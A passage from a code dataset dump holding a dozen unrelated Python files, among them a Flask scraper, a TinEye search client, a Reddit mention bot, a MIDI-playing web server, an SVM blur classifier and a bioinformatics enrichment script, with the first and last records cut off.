Flask(__name__)\n\n@app.route('/scrape')\ndef scrape():\n mng_latest=mtm.mng_latest()\n featured_image_url=mtm.featured_image_url()\n mars_weather=mtm.mars_weather()\n mars_facts=mtm.mars_facts()\n hemisphere_image_urls=mtm.hemisphere_image_urls()\n return render_template('index.html',mng_latest=mng_latest,featured_image_url=featured_image_url,\n mars_weather=mars_weather,mars_facts=mars_facts,hemisphere_image_urls=hemisphere_image_urls)\n \n@app.route('/shutdown', methods=['POST'])\ndef shutdown():\n shutdown_server()\n return 'Server shutting down...'\n\n\nif __name__=='__main__':\n app.run()","sub_path":"hw11_scraping/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"134717503","text":"from lib.colors import color\nfrom lib.relib import refind\nfrom operator import itemgetter\nfrom requests.exceptions import ConnectionError\nimport requests\nimport sys\nimport re\n\nclass tineye:\n\tdef __init__(self,type,content):\n\t\tself.type = type\n\t\tself.content = content\n\t\tself.image_url = \"https://www.tineye.com/search\"\n\t\tself.headers = {\n\t\t\"Host\": \"www.tineye.com\",\n\t\t\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\",\n\t\t\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n\t\t\"Accept-Encoding\": \"gzip, deflate, br\",\n\t\t\"Accept-Language\": \"en-US,en;q=0.5\",\n\t\t\"Referer\": \"https://www.tineye.com/\",}\n\n\tdef search(self):\n\t\tsession = requests.Session()\n\t\tsession.headers.update(self.headers)\n#\t\tif self.type == 'image':\n#\t\t\ttry:\n#\t\t\t\tfile = {'upload_file': open(self.filename,'rb')}\n#\t\t\texcept FileNotFoundError:\n#\t\t\t\tprint(color.FAIL+\"\\n[!]No such file '\"+self.filename+\"' .\\n\"+color.ENDC)\n#\t\t\t\tsys.exit()\n#\t\tdata = {\n#\t\t'Content-Disposition': 'form-data; name=\"image\"; filename=\"'+self.filename+'\"',\n#\t\t'Content-Type': 'image/jpeg'\n#\t\t}\n#\t\t\treq = session.post(self.image_url, files = file).text\n#\t\t\tprint(req)\n\t\tif self.type == 'url':\n\t\t\tdata = {\"url\":self.content}\n\t\t\tprint(color.OKGREEN+'\\n[*]Sending URL to tineye.'+color.ENDC)\n\t\t\treq = session.post(self.image_url, data = data).text\n#\t\t\tBEGINNING OF TAG SEARCH\n\t\t\threfs = refind('

Found on: item > link,description,title\n# iterate news items\nfor item in root.findall('./channel/item'):\n news = {}\n\n for child in item:\n if (child.tag == \"title\") or(child.tag == \"link\") or (child.tag == \"description\"):\n news[child.tag] = str(child.text.encode('utf8'))\n\n if len(news) == 3:\n newsitems.append(news)\n\n\n\n# writes json file\nfeed = open( path +filename[:filename.find(\".\")]+\".json\", \"w\")\nfeed.write('''{\n \"link\":\"''' + chlink[2:(len(chlink)-1)] + '''\",\n \"article\":''' + json.dumps(newsitems)+\"}\")\n\nfeed.close()\nfile.close()","sub_path":"updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"652000019","text":"# iterator are objects that can we iterated upon, you can built own iterator using iter_and next_methods, collectively called the iterator protocal\n\nmy_list = [1,2,3,4,5]\n\n#my_iter = iter(my_list) or\n\nmy_iter = my_list.__iter__()\n\nfor i in my_list:\n #print(next(my_iter)) or\n print(my_iter.__next__())\n","sub_path":"Python/Interview Que/Interview Companies/Helious/Iterators.py","file_name":"Iterators.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"616319857","text":"import random\nimport sys\nfrom datetime import date\nimport os\n\nwhile True:\n # chooses the mode, either addition or multiplication\n mode_input = input(\"Choose a testing mode: add(ition) or mult(iplication)\")\n\n if mode_input in 'addition':\n mode = '+'\n break\n elif mode_input in 'multiplication':\n mode = '*'\n break\n else:\n print(\"Invalid Mode. Must be either add(ition) or mult(iplication).\")\n\n# creates a file to write the results of the test\nnew_file_name = '{}_{}_test.txt'.format(str(date.today()), mode_input)\n\nif not os.path.exists('./results'):\n os.mkdir('./results')\n\nfile_path = './results' + new_file_name\n\nlimit = 12\n\nwith open(file_path, 'w') as file:\n # initiates the test\n operand_pairs = []\n\n for i in range(limit):\n for j in range(limit):\n operand_pairs.append((i + 1, j + 1))\n\n random.shuffle(operand_pairs)\n\n for current_pair in operand_pairs:\n\n correct_answer = 0\n\n if mode == '+':\n correct_answer = current_pair[0] + current_pair[1]\n elif mode == '*':\n correct_answer = current_pair[0] * current_pair[1]\n\n question = '{} {} {}'.format(current_pair[0], mode, current_pair[1])\n\n while True:\n try:\n guess = int(input(question + ' = '))\n break\n except ValueError:\n print(\"Invalid input, try again.\")\n\n if guess == correct_answer:\n print(\"Correct\")\n else:\n print(\"Incorrect. Correct answer was \" + str(correct_answer))\n file.write('For {}\\nguessed: {}, answer : {}\\n\\n'.format(question, guess, correct_answer))\n","sub_path":"RandomAdditionMultiplicationTesting/RandomAddMult.py","file_name":"RandomAddMult.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"157928172","text":"import praw, time\nfrom pprint import pprint\n\nprint('Connecting to reddit...')\n\nr = praw.Reddit('CharredMailBot v1.0 by charredgrass')\nr.login('CharredBot','somepassword')\n\nprint('Success!')\nprint('Reading comments.txt and users.txt.')\nf = open('comments.txt','r')\nalready_done = f.read()\nf.close()\nf = open('users.txt','r')\nusers = f.read().split()\nf.close()\n\nprint('Success!')\n\nsubreddit = 'Frozenfriendsfriends'\n\n\nwhile True:\n print('Scanning ' + subreddit + ' for mentions')\n comments = r.get_comments(subreddit)\n for comment in comments:\n num_names = 0\n already_sent = []\n words = comment.body.replace('?',' ').replace('.',' ').replace('!',' ').replace('\\'',' ').split()\n if '/u/' in comment.body and comment.id not in already_done:\n print('Comment Found! Logging...')\n already_done += ' '+comment.id\n f = open('comments.txt', 'w')\n f.write(already_done)\n f.close()\n for word in words:\n if word[:3] == '/u/':\n user_send_pm = word[3:]\n pprint(user_send_pm)\n u = None\n try:\n u = r.get_redditor(user_send_pm)\n if not (u.is_gold and num_names < 3):\n #Do not send message.\n if (not u == comment.author):# and (not u == comment.parent.author):\n if not u == None:\n r.send_message(u.name,'Username mention!','You have recieved a mention!\\n\\n' + comment.permalink)\n print('Message sent to ' + u.name)\n except:\n print('User ' + u.name + ' not found.')\n \n num_names += 1\n print('Waiting 30s before scanning again.')\n time.sleep(30)","sub_path":"CharredMailBot.py","file_name":"CharredMailBot.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"272837594","text":"#\n# Copyright (c) 2020 IBM Corp.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\"\"\"\nThe ``jupyter`` module contains functions to support the use of Text Extensions for Pandas\n in Jupyter notebooks.\n\"\"\"\n#\n# jupyter.py\n#\n# Part of text_extensions_for_pandas\n#\n#\n#\n\nimport pandas as pd\nimport numpy as np\nimport time\nfrom typing import *\n\n\ndef run_with_progress_bar(num_items: int, fn: Callable, item_type: str = \"doc\") \\\n -> List[pd.DataFrame]:\n \"\"\"\n Display a progress bar while iterating over a list of dataframes.\n\n :param num_items: Number of items to iterate over\n :param fn: A function that accepts a single integer argument -- let's\n call it `i` -- and performs processing for document `i` and returns\n a `pd.DataFrame` of results\n :param item_type: Human-readable name for the items that the calling\n code is iterating over\n\n \"\"\"\n # Imports inline to avoid creating a hard dependency on ipywidgets/IPython\n # for programs that don't call this funciton.\n # noinspection PyPackageRequirements\n import ipywidgets\n # noinspection PyPackageRequirements\n from IPython.display import display\n\n _UPDATE_SEC = 0.1\n result = [] # Type: List[pd.DataFrame]\n last_update = time.time()\n progress_bar = ipywidgets.IntProgress(0, 0, num_items,\n description=\"Starting...\",\n layout=ipywidgets.Layout(width=\"100%\"),\n style={\"description_width\": \"12%\"})\n display(progress_bar)\n for i in range(num_items):\n result.append(fn(i))\n now = time.time()\n if i == num_items - 1 or now - last_update >= _UPDATE_SEC:\n progress_bar.value = i + 1\n progress_bar.description = f\"{i + 1}/{num_items} {item_type}s\"\n last_update = now\n progress_bar.bar_style = \"success\"\n return result\n\n\ndef pretty_print_html(column: Union[\"SpanArray\", \"TokenSpanArray\"],\n show_offsets: bool) -> str:\n \"\"\"\n HTML pretty-printing of a series of spans for Jupyter notebooks.\n\n Args:\n column: Span column (either character or token spans)\n show_offsets: True to generate a table of span offsets in addition\n to the marked-up text\n \"\"\"\n\n # Generate a dataframe of atomic types to pretty-print the spans\n spans_html = column.as_frame().to_html()\n\n # Build up a mask of which characters in the target text are within\n # at least one span.\n text = column.target_text\n mask = np.zeros(shape=(len(text)), dtype=np.bool)\n # TODO: Vectorize\n for e in column:\n mask[e.begin:e.end] = True\n\n # Walk through the text, building up an HTML representation\n text_pieces = []\n for i in range(len(text)):\n if mask[i] and (i == 0 or not mask[i - 1]):\n # Starting a highlighted region\n text_pieces.append(\n \"\"\"\"\"\")\n elif not (mask[i]) and i > 0 and mask[i - 1]:\n # End of a bold region\n text_pieces.append(\"\")\n if text[i] == \"\\n\":\n text_pieces.append(\"
\")\n elif text[i] == \"&\":\n text_pieces.append(\"&\")\n elif text[i] == \"<\":\n text_pieces.append(\"<\")\n elif text[i] == \">\":\n text_pieces.append(\">\")\n elif text[i] == \"\\\"\":\n # Not strictly necessary, but just in case.\n text_pieces.append(\""\")\n elif text[i] == \"'\":\n # Not strictly necessary, but just in case.\n text_pieces.append(\"'\")\n elif text[i] == \"$\":\n # Dollar sign messes up Jupyter's JavaScript UI.\n # Place dollar sign in its own sub-span to avoid being misinterpeted as a LaTeX delimiter\n text_pieces.append(\"$\")\n else:\n text_pieces.append(text[i])\n\n # TODO: Use CSS here instead of embedding formatting into the\n # generated HTML\n if show_offsets:\n return f\"\"\"\n

\n \"\"\"\n else: # if not show_offsets\n return f\"\"\"\n
\n
\n

\n {\"\".join(text_pieces)}\n

\n
\n
\n \"\"\"","sub_path":"text_extensions_for_pandas/jupyter.py","file_name":"jupyter.py","file_ext":"py","file_size_in_byte":5537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"623815305","text":"import numpy as np \n\nfrom scipy.ndimage import variance\nfrom skimage import io\nfrom skimage.color import rgb2gray\nfrom skimage.filters import laplace\nfrom skimage.transform import resize\nfrom sklearn import preprocessing, svm\nfrom sklearn.externals import joblib\nfrom sklearn import metrics\n\nimport os\nimport sys\nimport matplotlib.pyplot as plt\n\n# Load image\nnot_blurry_folder = f'/home/duong/Documents/researching/GAN/common/image_enhance/image_cmt/test_good'\nblurry_folder = '/home/duong/Documents/researching/GAN/common/image_enhance/image_cmt/test_blurry'\n\ndef laplace_image(input_folder):\n sub_folders = os.listdir(input_folder)\n variances = []\n maximumes = []\n\n for folder in sub_folders:\n sub_folder = os.path.join(input_folder,folder)\n if not os.path.isdir(sub_folder):\n continue\n list_file = os.listdir(sub_folder)\n\n for file in list_file:\n if file.endswith(('.png','.jpg','JPEG')):\n input_file = os.path.join(sub_folder,file)\n\n #preprocessing\n img = io.imread(input_file)\n img = resize(img,(400,600))\n img = rgb2gray(img)\n\n #Edge Detection use Laplace\n edge_laplace = laplace(img, ksize=3)\n\n #print(f\"Variance: {variance(edge_laplace)}\")\n variances.append(variance(edge_laplace))\n\n #print(f'Maximum: {np.amax(edge_laplace)}')\n maximumes.append(np.amax(edge_laplace))\n return variances, maximumes\n\nvariances, maximumes = laplace_image(not_blurry_folder)\nvariances1, maximumes1 = laplace_image(blurry_folder)\n\nprint('length of sharp:',len(variances))\nprint('length of blurry:',len(variances1))\n\nload_model = False\nuse_svm = True\n\nsharp_laplaces = list(zip(variances,maximumes))\nblurry_laplaces = list(zip(variances1, maximumes1))\n\ny = np.concatenate((np.ones((51,)), np.zeros((51,))), axis=0)\nprint(\"y = \",y)\nlaplaces = np.concatenate((np.array(sharp_laplaces), np.array(blurry_laplaces)), axis=0)\n\n#laplaces = preprocessing.scale(laplaces)\n\n\nclf = svm.SVC(kernel='linear')\nclf.fit(laplaces, y)\n\n# print(\"Accuracy :\",metrics.accuracy_score(laplaces[:50],y[:50]))\n\nprint(f'Weights: {clf.coef_[0]}')\nprint(f'Intercept: {clf.intercept_}')\n\nr1 = clf.predict([[0.00040431, 0.1602369]]) # result: 0 (blurred)\nr2 = clf.predict([[0.01, 0.6]]) # result: 1 (sharp)\nprint('r1 = ',r1)\nprint('r2 = ',r2)\n\n#save model\njoblib.dump(clf, 'laplaces_model.pkl')\n\nclf = joblib.load('laplaces_model.pkl')\nresutl = clf.predict(np.array([blurry_laplaces[33]]))\nprint(resutl)\n\nresutl = clf.predict(np.array([sharp_laplaces[30]]))\nprint(resutl)\n\nx0 = [0,0.02]\ny0 = [0.5,0]\n\nplt.plot(variances, maximumes,'ro')\nplt.plot(variances1, maximumes1,'b.')\n#plt.plot(x0,y0)\nplt.plot()\n#plt.axis([0.0, 0.1, 0.0, 3.0])\nplt.xlabel('Variance (Laplace)')\nplt.ylabel('Maximum (Laplace)')\nplt.grid(True)\nplt.show()\n\n","sub_path":"support_deblurry_GAN/svm_train_detect_blurry.py","file_name":"svm_train_detect_blurry.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"18975726","text":"# glass pla!te changes pathlength\r\nn = 1.4\r\nl = 800\r\na= linspace(1, 40, 100) * pi / 180\r\nb = arcsin(sin(a)/n)\r\nr = a - b\r\nd = 3000000 # nm\r\np = (( n * d / cos(b) + d ) - (n * d + d * cos(r) / cos(b)))/l * 4 * 180 / pi\r\nfigure;plot(p-p[1])\r\ndd = (( n * d / cos(b) + d ) - (n * d + d * cos(r) / cos(b))) / 1000\r\nplot(diff(dd))\r\n","sub_path":"PythonVersion/python_optics.py","file_name":"python_optics.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"28028006","text":"from flask import Flask, render_template, flash, request, redirect, url_for\nfrom werkzeug.utils import secure_filename\nfrom threading import Thread\n\nimport os\nimport hashlib\nimport serial\nimport mido\n\n#Change working directory to current directory\nos.chdir(os.path.dirname(__file__))\n\n#Config data\nUPLOAD_FOLDER = os.getcwd() + '/uploads'\nTEMP_FOLDER = os.getcwd() + '/temp'\nALLOWED_EXTENSIONS = set(['midi', 'mid'])\n\nSEPERATOR='_:#:_'\n\nif not os.path.exists(UPLOAD_FOLDER):\n os.makedirs(UPLOAD_FOLDER)\nif not os.path.exists(TEMP_FOLDER):\n os.makedirs(TEMP_FOLDER)\n\n#Create application\napp = Flask(__name__)\n\n#Configure application\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.config['TEMP_FOLDER'] = TEMP_FOLDER\n\n#Music variables\nthread = \"\"\nstop = False\nplaing = False\n\n#Debug variables\nnot_existent = True\n\n#Help functions\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\ndef prevent_file_override_name(file):\n filename = file.filename\n file.save(os.path.join(app.config['TEMP_FOLDER'], filename))\n md5 = hashlib.md5()\n\n with open(os.path.join(app.config['TEMP_FOLDER'], filename), 'rb') as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n md5.update(chunk)\n os.remove(os.path.join(app.config['TEMP_FOLDER'], filename))\n return md5.hexdigest() + SEPERATOR + secure_filename(file.filename)\n\ndef get_uploaded_files():\n path = app.config['UPLOAD_FOLDER']\n files = []\n for file in os.listdir(path):\n if os.path.isfile(os.path.join(path, file)):\n files.append({'filename':file, 'name':file.split(SEPERATOR, 1)[1] \\\n .rsplit('.', 1)[0].replace('_', ' ')})\n return files\n\ndef play(midi):\n global plaing\n global stop\n\n plaing = True\n mido.set_backend('serial_output')\n\n print(\"Started playing: \", midi)\n\n with mido.open_output() as port:\n print('Using {}.'.format(port))\n\n for msg in mido.MidiFile(os.path.join(UPLOAD_FOLDER, midi)).play():\n if stop:\n break\n port.send(msg)\n\n\n#Server routes\n@app.route(\"/\")\ndef index():\n return redirect(url_for('cp_0'))\n\n@app.route(\"/cp\")\ndef cp_0():\n return render_template(\"index.html\", files=get_uploaded_files())\n\n@app.route(\"/cp/\")\ndef cp_1(upload):\n files = get_uploaded_files()\n return render_template(\"index.html\", upload=upload, files=files)\n\n@app.route(\"/upload\", methods=['GET', 'POST'])\ndef upload():\n if request.method == 'POST':\n #Isn't a file part in the post request?\n if 'file' not in request.files:\n flash('No file part!')\n return redirect(url_for('cp_1', upload='error'))\n file = request.files['file']\n\n #Is a file selected?\n if file.filename == '':\n flash('No file selected')\n return redirect(url_for('cp_1', upload='error'))\n\n #Is file allowed to be uploaded\n #Then save\n if file and allowed_file(file.filename):\n filename = prevent_file_override_name(file)\n file.stream.seek(0)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return redirect(url_for('cp_1', upload='succsess'))\n\n@app.route(\"/write\", methods=['POST'])\ndef write():\n global thread\n global plaing\n global stop\n if plaing:\n stop = True\n thread.join()\n stop = False\n thread = Thread(target=play, args=(request.form['midi'],))\n thread.start()\n return redirect(url_for('cp_1', upload='playing'))\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"221117682","text":"## Script for analysing the gene enrichment of a set of differentially expressed genes.\n## Input: file with differentially expressed genes, file with identified genes in experiment\n##\t\t file with process category-terms for all genes in species. \n\n#Last edited: 09/01/2018\n\n#input paths\npath_category = \"../data/openMS/results/goterm.csv\"\npath_sign = \"../data/openMS/statistics/sign_genes.csv\"\npath_iden = \"../data/openMS/statistics/diffacto_q_values.csv\"\n\n#output path\npath_sign_out = \"../data/openMS/enrichment/new/sign_process.csv\"\npath_iden_out = \"../data/openMS/enrichment/new/identified_process.csv\"\npath_process = \"../data/openMS/enrichment/new/enriched_processes_new.csv\"\n\n\n\nimport pandas as pd\nfrom scipy import stats\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n#import file with significantly expressed genes:\nsign_df = pd.read_csv(path_sign, header=0, index_col=0, usecols=[\"protein\",\"f_value\",\"p_value\",\"q_value\"])\ncg_df = pd.read_csv(path_category, header=0, index_col=0, usecols=[\"gene_id\",\"go_description\",\"go_id\"])\niden_df = pd.read_csv(path_iden, header=0, index_col=0, usecols=[\"protein\",\"f_value\",\"p_value\",\"q_value\"])\n\nprint(cg_df)\n\"\"\"\n###calc qvalue###\ndef get_q_value(pvals):\n\tq_sign = 0.05\n\tnum = len(pvals)\n\tq_vals = []\n\tsign = []\n\t##starting from the lowest ranked p-value:\n\tprev_q = pvals[-1]\n\tq_vals.append(prev_q)\n\tif prev_q < q_sign:\n\t\tsign.append(\"Yes\")\n\telse:\n\t\tsign.append(\"No\")\n\t##minimum for those with higher rank\n\tfor rank in range (num-1,0,-1):\n\t\tq_val = min(pvals[rank-1]*num/rank , prev_q)\n\t\tq_vals.append(q_val)\n\t\tprev_q = q_val\n\t\t##Find significant results\n\t\tif q_val < q_sign:\n\t\t\tsign.append(\"Yes\")\n\t\telse:\n\t\t\tsign.append(\"No\")\n\treturn q_vals[::-1], sign[::-1]\n\"\"\"\n\"\"\"\n##ignore\n#Make a dictonary of GO-terms:\ngo_d = dict()\ngoid_d = dict()\n\nfor protein,go in zip(cg_df.index.tolist(),cg_df[\"go_description\"]):\n\tif protein in go_d:\n\t\tgo_d[protein] = go_d[protein] + go\n\telse:\n\t\tgo_d[protein] = go\nprint(go_d)\n\"\"\"\n\n\n#new part for GO\nGO_counts = cg_df[\"go_id\"].value_counts()\nprint(GO_counts)\n\"\"\"\n###ANOVA: significant###\n#get counts for sign proteins\nprocess_list_sign = []\n#adding processes for each gene to dataframe\nfor index in sign_df.index.get_values():\t\t#index: proteinID\t\n\tprocess_list_sign.append(cg_df.loc[index][\"Process\"])\t#find process type\nsign_df = sign_df.assign(process = process_list_sign)\n#output df with processes\nsign_df.to_csv(path_sign_out)\n#counting number for each process\nprocess_counts = sign_df[\"process\"].value_counts()\nprocess_sign = process_counts.index.tolist()\ncounts_sign = process_counts.values.tolist()\n#add to dictionary with process counts\ncounts_df = pd.DataFrame(counts_sign,process_sign)\ncounts_df.index.names = [\"process\"]\ncounts_df.columns =[\"counts_significant\"]\ncounts_df = counts_df.assign(counts_identified=([0]*17))\n\"\"\"\n\n\n\"\"\"\n###Identified###\n#get counts for iden proteins\nprocess_list_iden = []\n##adding process to all genes\nfor index in iden_df.index.get_values():\t\t#index: proteinID\t\n\tprocess_list_iden.append(cg_df.loc[index][\"Process\"])\t#find process type\niden_df = iden_df.assign(process = process_list_iden)\n#output df with processes\niden_df.to_csv(path_iden_out)\n##counting number for each process\nprocess_counts = iden_df[\"process\"].value_counts()\nfor process,count in process_counts.items():\n\tcounts_df.ix[process][1]=count\n\t\n###Statistics: Hypergeometric test###\nN= len(sign_df)\t\t#total significant genes\nM = len(iden_df)\t#total identified genes\nx=counts_df[\"counts_significant\"]\t#process counts in significant\nn=counts_df[\"counts_identified\"]\t#process counts in identified\npvalsH = stats.hypergeom.sf(x-1, M, n, N, loc=0)\t#perform hypergeometric test\n\npvalsL = []\n\n#cdf wont accept my input as array/list/df. avoiding the struggle:\nfor xL,nL in zip(x,n):\n\tpvalL = stats.hypergeom.cdf(xL, M, nL, N, loc=0)\n\tpvalsL.append(pvalL)\n\ncounts_df = counts_df.assign(p_value_enrichment=pvalsH,p_value_depletion=pvalsL)\n\n\n#Sort according to p-value_depletion and add q-values\ncounts_df_pval = counts_df.sort_values(by=[\"p_value_depletion\"],ascending=True)\nqvalsL, signL = get_q_value(counts_df_pval[\"p_value_depletion\"])\ncounts_df_pval = counts_df_pval.assign(q_value_depletion=qvalsL)\ncounts_df_pval = counts_df_pval.assign(depletion_significant=signL)\n\n#sort according to p-value enrichment and add q-values\ncounts_df_pval = counts_df_pval.sort_values(by=[\"p_value_enrichment\"],ascending=True)\nqvalsH, signH = get_q_value(counts_df_pval[\"p_value_enrichment\"])\ncounts_df_pval = counts_df_pval.assign(q_value_enrichment=qvalsH)\ncounts_df_pval = counts_df_pval.assign(enrichment_significant=signH)\n\n#output process counts dataframe\t\ncounts_df_pval.to_csv(path_process)\n\n\n\n\n\n###Plots########################################################################################################\ncounts_df_sign = counts_df.sort_values(by=[\"counts_significant\"],ascending=True) #Sort according to #significant\nnum= len(counts_df)\nfig, ax = plt.subplots(figsize=(13,7))\nind = np.arange(num) # the x locations for the groups\nwidth = 0.3 # the width of the bars\nrects1 = ax.barh(ind, counts_df_sign[\"counts_identified\"], width, color='green')\nrects2 = ax.barh(ind + width, counts_df_sign[\"counts_significant\"], width, color='orange')\n\n# add some text for labels, title and axes ticks\nax.set_yticklabels(counts_df_sign.index)\nax.set_xlabel('Number of genes annotated')\nax.set_title('Enrichment of Categories')\nax.set_yticks(ind + width/2)\n\n#save plot\nax.legend((rects1[0], rects2[0]), ('Identified', 'ANOVA q<0.05'))\t\nplt.subplots_adjust(left=0.4)\nplt.savefig(\"../data/openMS/enrichment/new/enrichment_process_plot_new.png\")\nplt.close(fig)\n\n###normalized plot###\nnorm=[x/y for x, y in zip( counts_df_pval[\"counts_significant\"], counts_df_pval[\"counts_identified\"])]\ncounts_df_pval = counts_df_pval.assign(significant_normalized=norm)\ncounts_df_norm = counts_df_pval.sort_values(by=[\"significant_normalized\"],ascending=True) #sort according to norm-value\nfig, ax = plt.subplots(figsize=(10,6))\nrects = ax.barh(ind, counts_df_norm[\"significant_normalized\"], width, color='#335B8E')\nfor i, bar in enumerate(rects):\n\tif counts_df_norm['enrichment_significant'][i] == 'Yes':\n\t\t\tbar.set_color(\"#B7DBDB\")\n# Shrink current axis's height by 10% on the bottom\nbox = ax.get_position()\nax.set_position([box.x0, box.y0 + box.height * 0.1,\n box.width, box.height * 0.9])\n\n# Put a legend below current axis\n#ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\n# fancybox=True, shadow=True, ncol=2)\n\n# add some text for labels, title and axes ticks\nax.set_yticklabels(counts_df_norm.index)\nax.set_xlabel('Proportion of genes annotated')\nax.set_title('Normalised Enrichment of Categories')\nax.set_yticks(ind + width/2)\n\n#save plot\ncolour_blue = matplotlib.patches.Patch(color='#335B8E', label='Nonsignificant')\ncolour_yel = matplotlib.patches.Patch(color=\"#B7DBDB\", label='Significant enrichment')\n#plt.legend(handles=[colour_blue,colour_yel], loc=8)\nplt.legend(handles=[colour_blue,colour_yel], loc='upper center', bbox_to_anchor=(0.5, -0.1), ncol=2)\nplt.subplots_adjust(left=0.5, bottom=0.2)\nplt.savefig(\"../data/openMS/enrichment/new/enrichment_process_plot_new_norm.png\")\nplt.close(fig)\n\"\"\"\n\"\"\"\n###normalized plot###V2\nnorm=[x/M for x in (counts_df_pval[\"counts_identified\"])]\ncounts_df_pval = counts_df_pval.assign(significant_normalized=norm)\ncounts_df_norm = counts_df_pval.sort_values(by=[\"significant_normalized\"],ascending=True) #sort according to norm-value\nfig, ax = plt.subplots(figsize=(13,6))\nrects = ax.barh(ind, counts_df_norm[\"significant_normalized\"], width, color='blue')\nfor i, bar in enumerate(rects):\n\tif counts_df_norm['enrichment_significant'][i] == 'Yes':\n\t\t\tbar.set_color(\"#edd012\")\n\n# add some text for labels, title and axes ticks\nax.set_yticklabels(counts_df_norm.index)\nax.set_xlabel('Proportion of genes annotated')\nax.set_title('Normalised Enrichment of Categories')\nax.set_yticks(ind + width/2)\n\n#save plot\ncolour_blue = matplotlib.patches.Patch(color='blue', label='Nonsignificant')\ncolour_yel = matplotlib.patches.Patch(color=\"#edd012\", label='Significant enrichment')\nplt.legend(handles=[colour_blue,colour_yel])\nplt.subplots_adjust(left=0.4)\nplt.savefig(\"../data/openMS/enrichment/new/enrichment_process_plot_new_norm_V2.png\")\nplt.close(fig)\n\"\"\"","sub_path":"project/scripts/enrichment_analysis_script_checking_GO.py","file_name":"enrichment_analysis_script_checking_GO.py","file_ext":"py","file_size_in_byte":8304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"315426926","text":"\"\"\"\nCreated on 20 May 2016\n\n@author: Alan Greer\n\"\"\"\nfrom __future__ import print_function\n\nimport argparse\nimport logging\nimport time\nfrom latrd_channel import LATRDChannel\nfrom latrd_message import LATRDMessageException, LATRDMessage, GetMessage, PutMessage, PostMessage, ResponseMessage\nfrom latrd_reactor import LATRDReactor\n\n\nclass LATRDControlSimulator(object):\n DETECTOR_1M = 1\n DETECTOR_10M = 10\n\n def __init__(self, type=DETECTOR_1M):\n logging.basicConfig(format='%(asctime)-15s %(message)s')\n self._log = logging.getLogger(\".\".join([__name__, self.__class__.__name__]))\n self._log.setLevel(logging.DEBUG)\n self._ctrl_channel = None\n self._type = type\n self._reactor = LATRDReactor()\n self._store = {\n \"status\":\n {\n \"detector\":\n {\n \"state\": \"Idle\",\n \"description\": \"TRISTAN control interface\",\n \"serial_number\": \"0\",\n \"software_version\": \"0.0.1\",\n \"sensor_material\": \"Silicon\",\n \"sensor_thickness\": \"300 um\",\n \"x_pixel_size\": \"55 um\",\n \"y_pixel_size\": \"55 um\",\n \"x_pixels_in_detector\": 2048,\n \"y_pixels_in_detector\": 512,\n \"timeslice_number\": 4\n },\n \"housekeeping\":\n {\n \"standby\": \"On\",\n \"fem_power_enabled\": [True] * self._type,\n \"psu_temp\": [28.6] * self._type,\n \"psu_temp_alert\": [False] * self._type,\n \"fan_alert\": [False] * self._type,\n \"output_alert\": [False] * self._type,\n \"current_sense\": [1.5] * self._type,\n \"voltage_sense\": [2.1] * self._type,\n \"remote_temp\": [30.1] * self._type,\n \"fan_control_temp\": [36.3] * self._type,\n \"tacho\": [0.8] * self._type,\n \"pwm\": [128] * self._type\n },\n \"clock\":\n {\n \"dpll_lol\": [True] * self._type,\n \"dpll_hold\": [True] * self._type,\n \"clock_freq\": [65.7] * self._type\n },\n \"sensor\":\n {\n \"temp\": [65.8] * self._type,\n \"humidity\": [47.8] * self._type\n },\n \"fem\":\n {\n \"temp\": [45.3] * self._type\n }\n },\n \"config\":\n {\n \"state\": \"Idle\",\n \"exposure_time\": 0.0,\n \"gap\": 0.0,\n \"repeat_interval\": 0.0,\n \"frames\": 0,\n \"frames_per_trigger\": 0,\n \"n_trigger\": 0,\n \"mode\": \"Time_Energy\",\n \"profile\": \"Standard\",\n \"threshold\": 5.2,\n \"timeslice\":\n {\n \"duration_rollover_bits\": 18\n },\n \"bias\":\n {\n \"voltage\": 0.0,\n \"enable\": False\n },\n \"time\": \"2018-09-26T09:30Z\"\n }\n }\n\n def setup_control_channel(self, endpoint):\n self._ctrl_channel = LATRDChannel(LATRDChannel.CHANNEL_TYPE_ROUTER)\n self._ctrl_channel.bind(endpoint)\n self._reactor.register_channel(self._ctrl_channel, self.handle_ctrl_msg)\n\n def 